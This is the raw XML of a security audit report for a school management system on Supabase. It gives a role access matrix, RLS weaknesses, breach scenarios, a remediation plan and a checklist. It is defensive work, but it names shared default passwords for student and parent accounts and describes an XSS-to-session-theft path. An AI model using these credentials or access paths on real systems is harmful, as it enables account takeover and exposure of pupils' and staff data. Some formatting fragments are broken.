        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">* PASS with caveat: role-blind read access to salary data.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ROLE ACCESS MATRIX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Role              | Dashboard | Students | Finance | Payroll | Settings | Library | Parent | Student Portal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------------------|-----------|----------|---------|---------|----------|---------|--------|---------------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superadmin        | ALL       | ALL      | ALL     | ALL     | ALL      | ALL     | ALL    | ALL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             | admin     | ALL      | ALL     | ALL*    | branding | content | N/A    | N/A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deputy_admin      | deputy    | view     | limited | limited | N/A      | N/A     | N/A    | N/A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bursar            | bursar    | fees     | ALL     | limited | N/A      | N/A     | N/A    | N/A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registrar         | registrar | ALL      | N/A     | N/A     | N/A      | content | N/A    | N/A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reception         | reception | lookup   | N/A     | N/A     | N/A      | N/A     | N/A    | N/A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hod               | hod       | grades   | N/A     | N/A     | N/A      | content | N/A    | N/A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teacher           | teacher   | grades   | N/A     | N/A     | N/A      | own     | N/A    | N/A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class_teacher     | class-teacher | grades | N/A  | N/A     | N/A      | class   | N/A    | N/A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librarian         | library   | N/A      | N/A     | N/A     | N/A      | ALL     | N/A    | N/A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            | parent    | children | fees*   | N/A     | N/A      | N/A     | own    | N/A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student           | student   | own      | fees*   | N/A     | N/A      | N/A     | N/A    | own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">* = UI-gated only; API access depends on RLS.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"limited" = Can view but not full CRUD.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"content" = Read notices/library content only.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UNAUTHORIZED ACCESS RISKS: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1. ANY role can read payroll salary data via direct API (VULN-11)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2. ANY role can read auth.users data via direct API (VULN-04)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3. ANY authenticated user can create schools (VULN-06)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4. Students/parents can potentially access attendance/fee tables if RLS missing (VULN-05)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5. Feature-gated features are only UI-hidden; no server-side enforcement (INFO)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SUPABASE SECURITY REPORT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RLS Status Overview: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Total tables with RLS in migrations: ~45+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Tables with NO RLS in migrations:    ~6 (students, attendance, fee_payments,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classes, subjects, fee_assessments)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RLS disabled anywhere:               No (good)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GRANT to auth.users:                 YES (CRITICAL — VULN-04)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Weak Policies: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1. schools INSERT — open to all authenticated (VULN-06)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2. staff_select_* — too broad for payroll tables (VULN-11)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 finance-attachments storage — public, no school scoping (VULN-07)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4. school-assets storage — public, overwritable (VULN-07)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Unsafe RPC Functions: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1. get_my_school_id() / get_my_role() — SECURITY DEFINER without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SET search_path (VULN-12)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2. next_journal_number — EXECUTE granted to anon role (minor)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Missing Policies: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1. No INSERT policy restriction for schools (any user can create)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2. No DELETE policy on schools (even superadmin can't delete)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 No write policy on plans table (superadmin-only not enforced via RLS)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Broad Access Policies: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1. profiles SELECT — same-school reads all PII (names, emails, phones)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2. staff_select_* on payroll — all school staff see salaries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 student_portal_setup.sql — student table accessible by email lookup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DATA BREACH RISK ASSESSMENT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SCENARIO 1: School A accessing School B data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LIKELIHOOD: MEDIUM-HIGH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VECTORS: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If students/attendance/fee_payments tables lack RLS (VULN-05),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any user can query cross-school data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Storage buckets allow cross-tenant file access (VULN-07)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School switcher writes school_id from client (VULN-09)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IMPACT: Complete cross-tenant data breach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SCENARIO 2: Student accessing another student's records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LIKELIHOOD: LOW-MEDIUM (depends on RLS)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VECTORS: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Student portal resolves by email, not by route param (mitigated)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But if students table lacks RLS, student can query any record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StudentDocuments path is not school-scoped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IMPACT: Student privacy breach (grades, fees, personal info)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SCENARIO 3: Parent accessing another student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LIKELIHOOD: LOW-MEDIUM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VECTORS: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Parent portal filters by parent_id (good)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But attendance/fee tables may lack RLS (VULN-29)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IMPACT: Parent sees other students' attendance and fee data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SCENARIO 4: Teacher accessing payroll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LIKELIHOOD: HIGH (confirmed)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VECTORS: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staff_select_* policies allow teacher role to SELECT payroll tables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Direct API query returns salary data for all staff in school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IMPACT: Full salary exposure for all staff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SCENARIO 5: Exposed public documents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LIKELIHOOD: HIGH (confirmed)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VECTORS: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finance-attachments bucket is public with no auth check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school-assets bucket is public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student documents use public URLs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IMPACT: Financial documents, student records publicly accessible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SCENARIO 6: Privilege escalation via stored XSS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LIKELIHOOD: MEDIUM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VECTORS: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Student name XSS → admin views report card → session stolen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Stolen session = full admin access across all schools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IMPACT: Complete system compromise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SCENARIO 7: Default password account takeover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LIKELIHOOD: HIGH (trivial)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VECTORS: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Student@123 works for ALL student accounts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Parent@123 works for ALL parent accounts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- Bulk password reset available in admin UI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IMPACT: Mass account takeover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PRIORITIZED REMEDIATION PLAN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PHASE 1 — CRITICAL FIXES (Implement immediately before production)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1.1  Remove default passwords (VULN-01, VULN-02)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Generate random passwords via server-side edge function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Force password reset on first login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Remove "Reset ALL passwords" bulk action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1.2  Fix stored XSS (VULN-03)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Add esc() HTML-encoding function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Apply to ALL interpolated values in ReportCard, Alumni,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DocumentsCertificates HTML string builders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Audit all dangerouslySetInnerHTML sinks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1.3  Fix auth.users GRANT (VULN-04)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REVOKE SELECT ON auth.users FROM authenticated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Access auth data only through profiles table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1.4  Version-control critical table RLS (VULN-05)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Pull ALL existing policies from live DB via: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SELECT * FROM pg_policies;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Create migration files for students, attendance,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fee_payments, fee_assessments, classes, subjects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Enable RLS and define proper policies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1.5  Fix schools INSERT policy (VULN-06)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Restrict to superadmin role only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PHASE 2 — HIGH PRIORITY (Implement within 1-2 weeks)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2.1  Fix storage bucket security (VULN-07)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Make finance-attachments and documents private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Add school_id path prefixing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Create proper SELECT/INSERT/DELETE policies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2.2  Enforce disabled user de-authentication (VULN-08)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Check profile.disabled in authStore.init()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Force signOut() when disabled is true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2.3  Server-side school_id validation (VULN-09)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Create SECURITY DEFINER RPC for school switching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Disable direct profiles.school_id UPDATE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2.4  Fix admin self-approval (VULN-10)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Remove !isAdminRole() escape in Expenses/AP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2.5  Fix payroll read policies (VULN-11)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Restrict staff_select_* on payroll tables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2.6  Verify parent portal table RLS (VULN-29)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- Check attendance and fee_assessments in live DB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PHASE 3 — SECURITY HARDENING (Implement within 1 month)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3.1  Add SET search_path to SECURITY DEFINER functions (VULN-12)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3.2  Verify/restrict platform_settings access (VULN-13)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3.3  Atomic receipt number generation (VULN-14)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3.4  Payment duplicate detection (VULN-15)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3.5  Logout error handling (VULN-16)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3.6  Transaction wrapping for payment+ledger+GL (VULN-17)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3.7  Remove SVG from logo upload (VULN-18)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3.8  Restructure document paths with school_id (VULN-19)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3.9  Server-side audit logging via triggers (VULN-20)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PHASE 4 — LONG-TERM IMPROVEMENTS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4.1  Fix RLS role-name drift (VULN-21)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4.2  Add journal_line CHECK constraints (VULN-22)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4.3  Reduce feature cache TTL (VULN-23)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4.4  Add role-switch audit logging (VULN-24)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4.5  Fix SchoolCategoriesPage logAction calls (VULN-25)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4.6  Remove hardcoded Supabase fallbacks (VULN-26)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4.7  Adopt schema validation library (VULN-27)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4.8  Remove user_metadata.role fallback (VULN-28)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4.9  Add storage upload validation policies (VULN-30)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FINAL SECURITY CHECKLIST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AUTHENTICATION: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Login flow functional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Logout flow functional (with caveats — VULN-16)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Session persistence via Supabase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Disabled user de-authentication (VULN-08)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Default passwords (VULN-01, VULN-02)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Password reset flow exists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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Email verification (depends on Supabase config)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Auth state stored client-side only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No service role key in client code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AUTHORIZATION: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All routes behind ProtectedRoute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Correct allowedRoles on each route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Feature gating implemented for all dashboards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Feature gating is UI-only (no server-side enforcement)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Role constants centralized in roles.js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Self-approval bypass for admins (VULN-10)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MULTI-SCHOOL ISOLATION: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Core tables unverifiable (VULN-05)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schools INSERT open to all (VULN-06)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Storage cross-tenant access (VULN-07)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Client-controlled school_id (VULN-09)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Most academic/financial tables properly scoped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Audit logs properly scoped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SUPABASE RLS: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GRANT on auth.users (VULN-04)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Core tables missing from version control (VULN-05)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Most tables have proper RLS policies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SECURITY DEFINER without search_path (VULN-12)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RLS not disabled anywhere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No overly permissive USING true on sensitive tables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PROTECTION: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Stored XSS in document generation (VULN-03)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Salary data readable by all staff (VULN-11)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Platform settings may expose secrets (VULN-13)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Student portal uses email-based lookup (not ID)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Notice rendering uses safe React interpolation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INPUT VALIDATION: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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-side validation present but inconsistent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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Financial amounts validated on client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No schema validation library (VULN-27)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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DB CHECK constraints on some tables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FINANCIAL SECURITY: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Admin self-approval (VULN-10)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Duplicate payments possible (VULN-15)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Race condition on receipt numbers (VULN-14)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Non-atomic payment writes (VULN-17)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Negative amount validation on client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Reversals use compensating entries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FILE STORAGE SECURITY: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Public finance-attachments bucket (VULN-07)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Public school-assets bucket (VULN-07)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SVG upload accepted (VULN-18)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Student docs not school-scoped (VULN-19)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Avatar upload has type+size validation (client-only)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Exam papers use signed URLs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AUDIT LOGGING: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Client-side only — forgeable (VULN-20)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Critical mutations not logged (VULN-24)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logAction bug in SchoolCategoriesPage (VULN-25)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Core audit service exists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Audit logs have RLS protection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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Some school lifecycle events logged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ENVIRONMENT &amp; SECRETS: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.env file properly gitignored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No service role key in client code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[FAIL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardcoded anon key fallback (VULN-26)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No eval() usage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No exposed webhook URLs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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Env vars properly named (VITE_ prefix)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ROUTE PROTECTION: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All 12+ dashboard routes protected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Catch-all redirect for unknown routes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Login/forgot/reset pages public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006600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Content never flashes for unauthorized users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PARTIAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Feature access is UI-hiding only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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                  END OF SHULEPULSE SECURITY AUDIT REPORT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Total vulnerabilities documented: 30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CRITICAL:  5  (VULN-01 through VULN-05)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HIGH:      9  (VULN-06 through VULN-11, VULN-29)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MEDIUM:   10  (VULN-12 through VULN-20)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LOW:       6  (VULN-21 through VULN-25, VULN-23)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INFO:      5  (VULN-26 through VULN-30)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Audit performed: Read-only static analysis and migration review.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production data was modified, accessed, or exposed.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credentials, tokens, or personal information are disclosed in this report.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RECOMMENDED NEXT STEP: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Run the following SQL against the live Supabase DB (read-only) to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verify the unverifiable tables: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SELECT tablename, policyname, cmd, qual, with_check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FROM pg_policies ORDER BY tablename;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SELECT relname, relrowsecurity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FROM pg_class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WHERE relnamespace = 'public'::regnamespace AND relkind = 'r'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ORDER BY relname;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REVOKE SELECT ON auth.users FROM authenticated;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This will resolve the single most dangerous finding (VULN-04) and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confirm or deny the critical gaps (VULN-05).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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2026-08-24T07:55:06.003Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-24T07:55:06.017Z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